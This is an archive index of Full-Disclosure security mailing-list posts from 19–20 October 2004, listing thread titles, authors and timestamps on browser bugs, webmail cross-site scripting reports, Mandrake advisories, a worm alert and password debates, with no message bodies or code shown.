- Re: [Full-Disclosure] Re: Web browsers - a mini-farce Micheal Espinola Jr (Tue Oct 19 2004 - 18:57:35 CDT)
- Re: [Full-Disclosure] Re: Web browsers - a mini-farce Micheal Espinola Jr (Tue Oct 19 2004 - 19:03:49 CDT)
- Re: [Full-Disclosure] Web browsers - a mini-farce Martin (Tue Oct 19 2004 - 19:38:21 CDT)
- Re: [Full-Disclosure] Re: Web browsers - a mini-farce kf_lists (Wed Oct 20 2004 - 00:06:32 CDT)
- [Full-Disclosure] Sending remote procedure calls through e-mail (RPC-Mail) Abe Usher (Tue Oct 19 2004 - 21:26:43 CDT)
- [Full-Disclosure] How to Break Windows XP SP2 + Internet Explorer 6 SP2 http-equiv
excite.com (Tue Oct 19 2004 - 22:33:15 CDT) - [Full-Disclosure] MDKSA-2004:108 - Updated cvs packages fix vulnerability Mandrake Linux Security Team (Tue Oct 19 2004 - 23:25:01 CDT)
- [Full-Disclosure] MDKSA-2004:107 - Updated mozilla packages fix vulnerabilities Mandrake Linux Security Team (Tue Oct 19 2004 - 23:20:05 CDT)
- [Full-Disclosure] MDKSA-2004:109 - Updated libtiff packages fix multiple vulnerabilities Mandrake Linux Security Team (Tue Oct 19 2004 - 23:32:31 CDT)
- Re: [Full-Disclosure] Re: Web browsers - a mini-farce tcleary2
csc.com.au (Wed Oct 20 2004 - 00:22:46 CDT) - [Full-Disclosure] Changes.. Thor (Wed Oct 20 2004 - 00:14:28 CDT)
- RE: [Full-Disclosure] Senior M$ member says stop using passwords completely! Aviv Raff (Wed Oct 20 2004 - 01:16:29 CDT)
- [Full-Disclosure] America Online Webmail Cross Site Scripting Vulnerability Steven Adair (Tue Oct 19 2004 - 21:55:59 CDT)
- [Full-Disclosure] Netscape Webmail Cross Site Scripting Vulnerability Steven Adair (Tue Oct 19 2004 - 21:58:50 CDT)
- Re: [Full-Disclosure] Re: Web browsers - a mini-farce Georgi Guninski (Wed Oct 20 2004 - 01:51:17 CDT)
- [Full-Disclosure] WORM-BAGLE found in email. Hexstream Virus Alert (Wed Oct 20 2004 - 01:53:44 CDT)
- RE: [Full-Disclosure] Windows Time Synchronization - Best Practices James Edwards (Wed Oct 20 2004 - 02:22:33 CDT)
- Re: [Full-Disclosure] Senior M$ member says stop using passwords completely! stephane nasdrovisky (Wed Oct 20 2004 - 01:43:54 CDT)
- RE: [Full-Disclosure] Senior M$ member says stop using passwords completely! James.McKinlay
cnm.co.uk (Wed Oct 20 2004 - 02:26:26 CDT) - [Full-Disclosure] Re: Web browsers - a mini-farce Michal Zalewski (Wed Oct 20 2004 - 03:13:31 CDT)
- Re: [Full-Disclosure] Web browsers - a mini-farce Michal Zalewski (Wed Oct 20 2004 - 03:35:08 CDT)
- Re: [Full-Disclosure] Re: Re: Any update on SSH brute force attempts? Ronny Adsetts (Wed Oct 20 2004 - 04:56:47 CDT)
- Re: [Full-Disclosure] Re: Stupid idea Home Security (Wed Oct 20 2004 - 05:03:41 CDT)
- Re: [Full-Disclosure] Web browsers - a mini-farce Pablo (Wed Oct 20 2004 - 05:46:04 CDT)
- Re: [Full-Disclosure] Sending remote procedure calls through e-mail (RPC-Mail) Barrie Dempster (Wed Oct 20 2004 - 06:28:50 CDT)
- [Full-Disclosure] Re: IE bugs (Was: Web browsers - a mini-farce) Berend-Jan Wever (Wed Oct 20 2004 - 06:43:53 CDT)
- Re: [Full-Disclosure] Sending remote procedure calls through e-mail (RPC-Mail) michael williamson (Wed Oct 20 2004 - 07:34:06 CDT)
- [Full-Disclosure] Secunia Research: Multiple Browsers Tabbed Browsing Vulnerabilities Jakob Balle (Wed Oct 20 2004 - 08:01:31 CD